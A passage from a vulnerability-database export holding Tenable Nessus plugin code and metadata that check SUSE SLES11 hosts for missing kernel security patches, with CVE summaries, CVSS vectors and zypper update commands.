script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4578/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4580/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4913/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5244/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161672-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ea06d969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-kernel-source-12631=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-kernel-source-12631=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-source-12631=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-kernel-source-12631=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-source-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-syms-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-77.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:47", "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel allowed local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls (bnc#955654).\n\n - CVE-2015-7509: fs/ext4/namei.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) via a crafted no-journal filesystem, a related issue to CVE-2013-2015 (bnc#956707).\n\n - CVE-2015-7515: An out of bounds memory access in the aiptek USB driver could be used by physical local attackers to crash the kernel (bnc#956708).\n\n - CVE-2015-7550: The keyctl_read_key function in security/keys/keyctl.c in the Linux kernel did not properly use a semaphore, which allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted application that leverages a race condition between keyctl_revoke and keyctl_read calls (bnc#958951).\n\n - CVE-2015-7566: A malicious USB device could cause kernel crashes in the visor device driver (bnc#961512).\n\n - CVE-2015-7799: The slhc_init function in drivers/net/slip/slhc.c in the Linux kernel did not ensure that certain slot numbers are valid, which allowed local users to cause a denial of service (NULL pointer dereference and system crash) via a crafted PPPIOCSMAXCID ioctl call (bnc#949936).\n\n - CVE-2015-8215: net/ipv6/addrconf.c in the IPv6 stack in the Linux kernel did not validate attempted changes to the MTU value, which allowed context-dependent attackers to cause a denial of service (packet loss) via a value that is (1) smaller than the minimum compliant value or (2) larger than the MTU of an interface, as demonstrated by a Router Advertisement (RA) message that is not validated by a daemon, a different vulnerability than CVE-2015-0272. NOTE: the scope of CVE-2015-0272 is limited to the NetworkManager product (bnc#955354).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel allowed local users to gain privileges or cause a denial of service (BUG) via crafted keyctl commands that negatively instantiate a key, related to security/keys/encrypted-keys/encrypted.c, security/keys/trusted.c, and security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-8543: The networking implementation in the Linux kernel did not validate protocol identifiers for certain protocol families, which allowed local users to cause a denial of service (NULL function pointer dereference and system crash) or possibly gain privileges by leveraging CLONE_NEWUSER support to execute a crafted SOCK_RAW application (bnc#958886).\n\n - CVE-2015-8550: Optimizations introduced by the compiler could have lead to double fetch vulnerabilities, potentially possibly leading to arbitrary code execution in backend (bsc#957988). (bsc#957988 XSA-155).\n\n - CVE-2015-8551: The PCI backend driver in Xen, when running on an x86 system and using Linux as the driver domain, allowed local guest administrators to hit BUG conditions and cause a denial of service (NULL pointer dereference and host OS crash) by leveraging a system with access to a passed-through MSI or MSI-X capable physical PCI device and a crafted sequence of XEN_PCI_OP_* operations, aka 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8552: The PCI backend driver in Xen, when running on an x86 system and using Linux as the driver domain, allowed local guest administrators to generate a continuous stream of WARN messages and cause a denial of service (disk consumption) by leveraging a system with access to a passed-through MSI or MSI-X capable physical PCI device and XEN_PCI_OP_enable_msi operations, aka 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8569: The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel do not verify an address length, which allowed local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application (bnc#959190).\n\n - CVE-2015-8575: The sco_sock_bind function in net/bluetooth/sco.c in the Linux kernel did not verify an address length, which allowed local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application (bnc#959399).\n\n - CVE-2015-8767: net/sctp/sm_sideeffect.c in the Linux kernel did not properly manage the relationship between a lock and a socket, which allowed local users to cause a denial of service (deadlock) via a crafted sctp_accept call (bnc#961509).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel allowed local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov (bnc#963765).\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel driver when the network was considered congested. The kernel would incorrectly misinterpret the congestion as an error condition and incorrectly free/clean up the skb. When the device would then send the skb's queued, these structures would be referenced and may panic the system or allow an attacker to escalate privileges in a use-after-free scenario.(bsc#966437).\n\n - CVE-2015-8816: A malicious USB device could cause kernel crashes in the in hub_activate() function (bnc#968010).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function in drivers/tty/tty_io.c in the Linux kernel allowed local users to obtain sensitive information from kernel memory or cause a denial of service (use-after-free and system crash) by making a TIOCGETD ioctl call during processing of a TIOCSETD ioctl call (bnc#961500).\n\n - CVE-2016-2069: A race in invalidating paging structures that were not in use locally could have lead to disclosoure of information or arbitrary code exectution (bnc#963767).\n\n - CVE-2016-2143: On zSeries a fork of a large process could have caused memory corruption due to incorrect page table handling. (bnc#970504, LTC#138810).\n\n - CVE-2016-2184: A malicious USB device could cause kernel crashes in the alsa usb-audio device driver (bsc#971125).\n\n - CVE-2016-2185: A malicious USB device could cause kernel crashes in the usb_driver_claim_interface function (bnc#971124).\n\n - CVE-2016-2186: A malicious USB device could cause kernel crashes in the powermate device driver (bnc#970958).\n\n - CVE-2016-2384: A double free on the ALSA umidi object was fixed. (bsc#966693).\n\n - CVE-2016-2543: A missing NULL check at remove_events ioctl in the ALSA seq driver was fixed. (bsc#967972).\n\n - CVE-2016-2544: Fix race at timer setup and close in the ALSA seq driver was fixed. (bsc#967973).\n\n - CVE-2016-2545: A double unlink of active_list in the ALSA timer driver was fixed. (bsc#967974).\n\n - CVE-2016-2546: A race among ALSA timer ioctls was fixed (bsc#967975).\n\n - CVE-2016-2547,CVE-2016-2548: The ALSA slave timer list handling was hardened against hangs and races.\n (CVE-2016-2547,CVE-2016-2548,bsc#968011,bsc#968012).\n\n - CVE-2016-2549: A stall in ALSA hrtimer handling was fixed (bsc#968013).\n\n - CVE-2016-2782: A malicious USB device could cause kernel crashes in the visor device driver (bnc#968670).\n\n - CVE-2016-3137: A malicious USB device could cause kernel crashes in the cypress_m8 device driver (bnc#970970).\n\n - CVE-2016-3139: A malicious USB device could cause kernel crashes in the wacom device driver (bnc#970909).\n\n - CVE-2016-3140: A malicious USB device could cause kernel crashes in the digi_acceleport device driver (bnc#970892).\n\n - CVE-2016-3156: A quadratic algorithm could lead to long kernel ipv4 hangs when removing a device with a large number of addresses. (bsc#971360).\n\n - CVE-2016-3955: A remote buffer overflow in the usbip driver could be used by authenticated attackers to crash the kernel. (bsc#975945)\n\n - CVE-2016-2847: A local user could exhaust kernel memory by pushing lots of data into pipes. (bsc#970948).\n\n - CVE-2016-2188: A malicious USB device could cause kernel crashes in the iowarrior device driver (bnc#970956).\n\n - CVE-2016-3138: A malicious USB device could cause kernel crashes in the cdc-acm device driver (bnc#970911).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-05-04T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1203-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2015", "CVE-2013-7446", "CVE-2015-0272", "CVE-2015-7509", "CVE-2015-7515", "CVE-2015-7550", "CVE-2015-7566", "CVE-2015-7799", "CVE-2015-8215", "CVE-2015-8539", "CVE-2015-8543", "CVE-2015-8550", "CVE-2015-8551", "CVE-2015-8552", "CVE-2015-8569", "CVE-2015-8575", "CVE-2015-8767", "CVE-2015-8785", "CVE-2015-8812", "CVE-2015-8816", "CVE-2016-0723", "CVE-2016-2069", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2188", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-3955"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-bigsmp", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1203-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90884", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1203-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90884);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2015\", \"CVE-2013-7446\", \"CVE-2015-0272\", \"CVE-2015-7509\", \"CVE-2015-7515\", \"CVE-2015-7550\", \"CVE-2015-7566\", \"CVE-2015-7799\", \"CVE-2015-8215\", \"CVE-2015-8539\", \"CVE-2015-8543\", \"CVE-2015-8550\", \"CVE-2015-8551\", \"CVE-2015-8552\", \"CVE-2015-8569\", \"CVE-2015-8575\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2188\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-3955\");\n script_bugtraq_id(59512);\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1203-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2015-7509: fs/ext4/namei.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (system crash) via a crafted no-journal\n filesystem, a related issue to CVE-2013-2015\n (bnc#956707).\n\n - CVE-2015-7515: An out of bounds memory access in the\n aiptek USB driver could be used by physical local\n attackers to crash the kernel (bnc#956708).\n\n - CVE-2015-7550: The keyctl_read_key function in\n security/keys/keyctl.c in the Linux kernel did not\n properly use a semaphore, which allowed local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted application that leverages a race\n condition between keyctl_revoke and keyctl_read calls\n (bnc#958951).\n\n - CVE-2015-7566: A malicious USB device could cause kernel\n crashes in the visor device driver (bnc#961512).\n\n - CVE-2015-7799: The slhc_init function in\n drivers/net/slip/slhc.c in the Linux kernel did not\n ensure that certain slot numbers are valid, which\n allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) via a crafted\n PPPIOCSMAXCID ioctl call (bnc#949936).\n\n - CVE-2015-8215: net/ipv6/addrconf.c in the IPv6 stack in\n the Linux kernel did not validate attempted changes to\n the MTU value, which allowed context-dependent attackers\n to cause a denial of service (packet loss) via a value\n that is (1) smaller than the minimum compliant value or\n (2) larger than the MTU of an interface, as demonstrated\n by a Router Advertisement (RA) message that is not\n validated by a daemon, a different vulnerability than\n CVE-2015-0272. NOTE: the scope of CVE-2015-0272 is\n limited to the NetworkManager product (bnc#955354).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel\n allowed local users to gain privileges or cause a denial\n of service (BUG) via crafted keyctl commands that\n negatively instantiate a key, related to\n security/keys/encrypted-keys/encrypted.c,\n security/keys/trusted.c, and\n security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-8543: The networking implementation in the\n Linux kernel did not validate protocol identifiers for\n certain protocol families, which allowed local users to\n cause a denial of service (NULL function pointer\n dereference and system crash) or possibly gain\n privileges by leveraging CLONE_NEWUSER support to\n execute a crafted SOCK_RAW application (bnc#958886).\n\n - CVE-2015-8550: Optimizations introduced by the compiler\n could have lead to double fetch vulnerabilities,\n potentially possibly leading to arbitrary code execution\n in backend (bsc#957988). (bsc#957988 XSA-155).\n\n - CVE-2015-8551: The PCI backend driver in Xen, when\n running on an x86 system and using Linux as the driver\n domain, allowed local guest administrators to hit BUG\n conditions and cause a denial of service (NULL pointer\n dereference and host OS crash) by leveraging a system\n with access to a passed-through MSI or MSI-X capable\n physical PCI device and a crafted sequence of\n XEN_PCI_OP_* operations, aka 'Linux pciback missing\n sanity checks (bnc#957990).\n\n - CVE-2015-8552: The PCI backend driver in Xen, when\n running on an x86 system and using Linux as the driver\n domain, allowed local guest administrators to generate a\n continuous stream of WARN messages and cause a denial of\n service (disk consumption) by leveraging a system with\n access to a passed-through MSI or MSI-X capable physical\n PCI device and XEN_PCI_OP_enable_msi operations, aka\n 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8569: The (1) pptp_bind and (2) pptp_connect\n functions in drivers/net/ppp/pptp.c in the Linux kernel\n do not verify an address length, which allowed local\n users to obtain sensitive information from kernel memory\n and bypass the KASLR protection mechanism via a crafted\n application (bnc#959190).\n\n - CVE-2015-8575: The sco_sock_bind function in\n net/bluetooth/sco.c in the Linux kernel did not verify\n an address length, which allowed local users to obtain\n sensitive information from kernel memory and bypass the\n KASLR protection mechanism via a crafted application\n (bnc#959399).\n\n - CVE-2015-8767: net/sctp/sm_sideeffect.c in the Linux\n kernel did not properly manage the relationship between\n a lock and a socket, which allowed local users to cause\n a denial of service (deadlock) via a crafted sctp_accept\n call (bnc#961509).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in\n fs/fuse/file.c in the Linux kernel allowed local users\n to cause a denial of service (infinite loop) via a\n writev system call that triggers a zero length for the\n first segment of an iov (bnc#963765).\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel\n driver when the network was considered congested. The\n kernel would incorrectly misinterpret the congestion as\n an error condition and incorrectly free/clean up the\n skb. When the device would then send the skb's queued,\n these structures would be referenced and may panic the\n system or allow an attacker to escalate privileges in a\n use-after-free scenario.(bsc#966437).\n\n - CVE-2015-8816: A malicious USB device could cause kernel\n crashes in the in hub_activate() function (bnc#968010).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function\n in drivers/tty/tty_io.c in the Linux kernel allowed\n local users to obtain sensitive information from kernel\n memory or cause a denial of service (use-after-free and\n system crash) by making a TIOCGETD ioctl call during\n processing of a TIOCSETD ioctl call (bnc#961500).\n\n - CVE-2016-2069: A race in invalidating paging structures\n that were not in use locally could have lead to\n disclosoure of information or arbitrary code exectution\n (bnc#963767).\n\n - CVE-2016-2143: On zSeries a fork of a large process\n could have caused memory corruption due to incorrect\n page table handling. (bnc#970504, LTC#138810).\n\n - CVE-2016-2184: A malicious USB device could cause kernel\n crashes in the alsa usb-audio device driver\n (bsc#971125).\n\n - CVE-2016-2185: A malicious USB device could cause kernel\n crashes in the usb_driver_claim_interface function\n (bnc#971124).\n\n - CVE-2016-2186: A malicious USB device could cause kernel\n crashes in the powermate device driver (bnc#970958).\n\n - CVE-2016-2384: A double free on the ALSA umidi object\n was fixed. (bsc#966693).\n\n - CVE-2016-2543: A missing NULL check at remove_events\n ioctl in the ALSA seq driver was fixed. (bsc#967972).\n\n - CVE-2016-2544: Fix race at timer setup and close in the\n ALSA seq driver was fixed. (bsc#967973).\n\n - CVE-2016-2545: A double unlink of active_list in the\n ALSA timer driver was fixed. (bsc#967974).\n\n - CVE-2016-2546: A race among ALSA timer ioctls was fixed\n (bsc#967975).\n\n - CVE-2016-2547,CVE-2016-2548: The ALSA slave timer list\n handling was hardened against hangs and races.\n (CVE-2016-2547,CVE-2016-2548,bsc#968011,bsc#968012).\n\n - CVE-2016-2549: A stall in ALSA hrtimer handling was\n fixed (bsc#968013).\n\n - CVE-2016-2782: A malicious USB device could cause kernel\n crashes in the visor device driver (bnc#968670).\n\n - CVE-2016-3137: A malicious USB device could cause kernel\n crashes in the cypress_m8 device driver (bnc#970970).\n\n - CVE-2016-3139: A malicious USB device could cause kernel\n crashes in the wacom device driver (bnc#970909).\n\n - CVE-2016-3140: A malicious USB device could cause kernel\n crashes in the digi_acceleport device driver\n (bnc#970892).\n\n - CVE-2016-3156: A quadratic algorithm could lead to long\n kernel ipv4 hangs when removing a device with a large\n number of addresses. (bsc#971360).\n\n - CVE-2016-3955: A remote buffer overflow in the usbip\n driver could be used by authenticated attackers to crash\n the kernel. (bsc#975945)\n\n - CVE-2016-2847: A local user could exhaust kernel memory\n by pushing lots of data into pipes. (bsc#970948).\n\n - CVE-2016-2188: A malicious USB device could cause kernel\n crashes in the iowarrior device driver (bnc#970956).\n\n - CVE-2016-3138: A malicious USB device could cause kernel\n crashes in the cdc-acm device driver (bnc#970911).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=758040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=781018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=879378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=879381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=904035\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 